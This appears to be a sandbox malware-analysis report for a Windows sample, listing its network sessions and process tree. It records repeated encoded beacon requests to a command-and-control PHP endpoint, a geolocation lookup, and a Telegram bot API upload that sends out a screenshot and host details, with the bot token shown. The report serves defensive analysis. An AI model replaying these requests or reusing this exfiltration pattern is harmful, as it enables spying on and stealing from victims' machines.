                                                                                            Jan 11, 2025 18:09:47.198117018 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMFp2T4FlaPlXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:09:47.955065012 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:47 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            28 | 192.168.2.4 | 53936 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:52.967303038 CET2947OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJBTVq9UNNp2TzEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:53.718880892 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:53 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            29 | 192.168.2.4 | 53937 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:09:58.733536959 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulENBp2T4FlaPJTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:59.485311031 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:59 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            30 | 192.168.2.4 | 53938 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:04.574079990 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMBp2T1UkaPFTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:05.287916899 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            31 | 192.168.2.4 | 53939 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:10.309047937 CET | 2973 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:11.064337969 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            32 | 192.168.2.4 | 53940 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:16.074358940 CET | 2949 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:10:16.847018957 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:16 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            33 | 192.168.2.4 | 53941 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:21.857414961 CET | 2973 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:22.655172110 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            34 | 192.168.2.4 | 53942 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:27.667526960 CET | 2973 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:28.415582895 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:28 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            35 | 192.168.2.4 | 53943 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:33.433279037 CET | 2949 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:10:34.193864107 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:34 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            36 | 192.168.2.4 | 53944 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:39.214437962 CET | 2947 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:39.949934006 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            37 | 192.168.2.4 | 53945 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:44.963181019 CET | 2973 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:10:45.731498003 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:45 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22


                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                            38 | 192.168.2.4 | 53946 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:50.744741917 CET | 2973 | OUT | GET /c243cb78.php? [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
Jan 11, 2025 18:10:51.481988907 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:51 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 53947 | 5.101.152.15 | 80 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
                                                                                            Jan 11, 2025 18:10:56.495902061 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dJp2T3VlaPdXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
Jan 11, 2025 18:10:57.234077930 CET | 350 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:10:57 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 53639 | 34.117.59.81 | 443 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 17:07:18 UTC | 63 | OUT | GET /json HTTP/1.1
                                                                                            Host: ipinfo.io
                                                                                            Connection: Keep-Alive
2025-01-11 17:07:18 UTC | 345 | IN | HTTP/1.1 200 OK
                                                                                            access-control-allow-origin: *
                                                                                            Content-Length: 321
                                                                                            content-type: application/json; charset=utf-8
                                                                                            date: Sat, 11 Jan 2025 17:07:18 GMT
                                                                                            x-content-type-options: nosniff
                                                                                            via: 1.1 google
                                                                                            strict-transport-security: max-age=2592000; includeSubDomains
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close
2025-01-11 17:07:18 UTC | 321 | IN | Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 53641 | 149.154.167.220 | 443 | 4476 | C:\Recovery\Idle.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 17:07:19 UTC | 691 | OUT | POST /bot7170051875:AAE6pL_pl17E85H-TlJS2rKEh_uqVfRc8Gk/sendPhoto?chat_id=5922069347&caption=%E2%9D%95%20Pipavsya%20%E2%9D%95%0A%E2%80%A2%20ID%3A%202068c5dd94a8a9c670748c61bdf89871812759c4%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20035347%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%208.46.123.189%0A%E2%80%A2%20GEO%3A%20US%20%2F%20New%20York%20City%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CIdle.exe HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=------------------------8dd3253052978f8
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 696321
                                                                                            Expect: 100-continue
                                                                                            Connection: Keep-Alive
2025-01-11 17:07:20 UTC | 25 | IN | HTTP/1.1 100 Continue
2025-01-11 17:07:20 UTC | 16355 | OUT | Data Ascii: --------------------------8dd3253052978f8 Content-Disposition: form-data; name="photo"; filename="screenshot.png" Content-Type: multipart/form-data [PNG image data]
2025-01-11 17:07:21 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Sat, 11 Jan 2025 17:07:20 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 56
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            {"ok":false,"error_code":400,"description":"Logged out"}


                                                                                            Target ID:0
                                                                                            Start time:12:06:54
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Users\user\Desktop\6uPVRnocVS.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\6uPVRnocVS.exe"
                                                                                            Imagebase:0xf0000
                                                                                            File size:2'180'702 bytes
                                                                                            MD5 hash:7A193E404A6285A41ABA3019479D1749
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:12:06:55
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\ssh\gnR14pXyuoFKj0R1.vbe"
                                                                                            Imagebase:0x80000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ssh\ML9lnBLRkA6sXD0.bat" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\conhost.exe
